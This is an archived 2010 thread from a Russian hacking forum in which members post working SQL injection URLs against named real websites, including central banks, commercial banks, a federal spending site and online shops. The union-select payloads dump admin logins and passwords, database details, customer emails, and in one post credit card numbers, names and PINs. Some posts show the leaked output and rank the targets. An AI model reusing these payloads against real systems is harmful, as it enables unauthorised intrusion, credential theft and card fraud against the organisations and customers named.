HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12891  
Старый 26.08.2010, 23:57
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://marketnara.com/home/view_goods.html?pid=-18+union+select+1,group_concat(name,char(58),pass) ,3,4,5,6,7,8,9,10,11,121,3,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28+from+admin
 
Ответить с цитированием

  #12892  
Старый 27.08.2010, 00:05
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

The Central Bank of Mauritius

Oracle

Код:
Code:
http://bom.intnet.mu/?id=-40416+union+select+null+from+sys.dual--
Eastern Caribbean Central Bank

mssql

Код:
Code:
http://www.eccb-centralbank.org/About/vac_details.asp?vacID=63+or+1=(select top 1 table_name from information_schema.tables)--
Version:

Цитата:
Сообщение от None  
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
 
Ответить с цитированием

  #12893  
Старый 27.08.2010, 02:15
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
Отправить сообщение для *uNkN0Wn* с помощью ICQ
По умолчанию

PR - 5

Цитата:
Сообщение от None  
http://www.valstybe.com/index.php?id=-8051+union+select+1,2,3,4,5,6,version(),8--
user: root@localhost

version: 4.0.25

database: eurovals_valstybe


PR - 7

Цитата:
Сообщение от None  
http://www.fedspending.org/fpds/fpds.php?parent_id=-309123+union+select+group_concat(version(),char(58 ),user(),char(58),database())+--+
version: 4.1.22

user: root@localhost

database: fpds2009z


сайт некой федеральной службы вроде как :\
 
Ответить с цитированием

  #12894  
Старый 27.08.2010, 13:04
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
Отправить сообщение для *uNkN0Wn* с помощью ICQ
По умолчанию

Цитата:
Сообщение от None  
http://www.indiaebazar.com/krishnendu/prodesc.php?pid=-40+union+select+1,group_concat(username,char(58),p assword),3,4,5,6+from+eb_user_login+--+
user() indiaeba_ebauser@localhost

version() 5.0.91-community

database() indiaeba_ebazar


Цитата:
Сообщение от None  
http://www.31girl.com/shop.php?pid=-1+union+select+1,2,3,4,group_concat(CreditCardType ,char(58),CreditCardNumber,char(58),CreditCardName ,char(58),CreditCardPinNumber,0x3c62723e),6,7,8+fr om+shop_orders--
user() i31girl_public@localhost

version() 5.0.91-community

database() i31girl_shop


Credit Cards
 
Ответить с цитированием

  #12895  
Старый 27.08.2010, 15:12
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
Отправить сообщение для *uNkN0Wn* с помощью ICQ
По умолчанию

Цитата:
Сообщение от None  
http://www.cashpawnshop.com/item.php?pid=-212+union+select+1,2,3,group_concat(aid,char(58),p wd,0x3c62723e),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19+from+nuke_authors+--+
Цитата:
Сообщение от None  
http://www.wofgdesigns.com/shop.php?pid=-22+union+select+1,2,3,4,5,6,group_concat(version() ,0x3c62723e,user(),0x3c62723e,database()),8,9,10,1 1,12+--+
Цитата:
Сообщение от None  
http://www.easypha-max.com/productdetails.php?id=&pid=-440+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+--+
user() platform2u@192.168.0.171

version() 5.0.85-enterprise

database() ec2u
 
Ответить с цитированием

  #12896  
Старый 28.08.2010, 02:01
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056

Репутация: 1089


Отправить сообщение для Kusto с помощью ICQ
По умолчанию

ну что банковская тема еще жива? Кстати заметил что в зоне ру банковские сайты намного защищеннее чем их зарубежные аналоги, хотя и можно при большом желании найти багу

Банк «Объединённый капитал»

Код:
Code:
http://www.okbank.ru/?p=-61+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
 
Ответить с цитированием

  #12897  
Старый 28.08.2010, 11:14
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917

Репутация: 17
По умолчанию

Цитата:
Сообщение от None  
http://www.denmanconsulting.com/print_articles.asp?id=149+and+1=@@version%20+--+


PR 1

Цитата:
Сообщение от None  
http://www.sedap-sekejap.com/print_articles.asp?id=1+or+1=%28SELECT+TOP+1+TABLE _NAME+FROM+INFORMATION_SCHEMA.TABLES%29--


PR 4

Цитата:
Сообщение от None  
http://www.france-israel.org/modules/print_articles.php?art_id=-1+union+select+version%28%29%20--


PR 4

Цитата:
Сообщение от None  
http://www.cyberschool.oxfam.org.hk/print_articles.php?id=-90+union+select+1,2,3,4,concat%28@i:=0x00,@o:=0x0d 0a,benchmark%2858,@o:=CONCAT%28@o,0x0d0a,%28SELECT +concat%28table_schema,0x2E,@i:=table_name%29+from +information_schema.tables+WHERE+table_name%3E@i+o rder+by+table_name+LIMIT%201%29%29%29,@o%29,6,7,8, 9,0,1,2,3--


ТИЦ 10 PR 6

Цитата:
Сообщение от None  
http://www.ipa.spb.su/html/print_news.php?id=17&nid=-797+union+select+1,2,3,4,5,6,version%28%29,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2--


ТИЦ 10 PR 6

Цитата:
Сообщение от None  
http://www.clarkapartments.com/print_news.asp?id=248+and+1=@@version%20--


ТИЦ 10 PR 5

Цитата:
Сообщение от None  
http://www.emk.ru/print_news.php?id=44+union+select+1,2,3,4,5,6+--+


ТИЦ 220 PR 3

Цитата:
Сообщение от None  
http://www.ekatbo.ru/print_news.php?id=1360+union+select+1,2,3,4,5,6,7, 8,9,0,1--


PR 1

Цитата:
Сообщение от None  
http://www.bosam.ru/print_news.php?id=339+union+select+1,2,3,4,5,6,7,8 ,9,0,1%20--


PR 2

Цитата:
Сообщение от None  
http://www.parlamentiregionali.it/inc/php/print_news.php?id=-59221+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8%20+--+


PR 5
 
Ответить с цитированием

  #12898  
Старый 28.08.2010, 14:38
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме:
333485

Репутация: 13
По умолчанию

http://www.queento.ru/site.php?id=-57+union+select+1,concat_ws(0x3a,login,0x3a,pass_h ash),3,4,5,6,7,8+from+accounts+limit+0,1--

http://www.safarimaldives.com/live.php?id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5+--+

http://www.pacificotowncenter.com/world.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,LOGIN,0x 3a,PASSWORD),8,9,10+from+tbl_admin+--+
 
Ответить с цитированием

  #12899  
Старый 28.08.2010, 15:54
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
Отправить сообщение для *uNkN0Wn* с помощью ICQ
По умолчанию

Цитата:
Сообщение от None  
http://www.ozarkhomesandproperty.com/mls/index.php?client_id=-2+union+select+1,2,group_concat(email),4,5+from+le ads+--+
PR - 6

Цитата:
Сообщение от None  
http://www.virtualstudios.gr/portfolio.cfm?client_id=-85+union+select+1,2,3,4,5,6,group_concat(username, 0x3a,password),8,9,10,11,12,13,14+from+users+--+
Цитата:
Сообщение от None  
http://www.gearjunkies-userstudios.com/studio.php?stid=-221+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13+--+
 
Ответить с цитированием

  #12900  
Старый 28.08.2010, 16:33
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Getin Holding S.A.

до банка не добрался

Код:
Code:
http://www.getin.pl/en/index.php?&level=pnews&&id=-146+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),database(),user()),15,16,17,18,19,20,21--
Код:
Code:
5.1.48-1-log:getin2:getin2@10.0.0.36
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ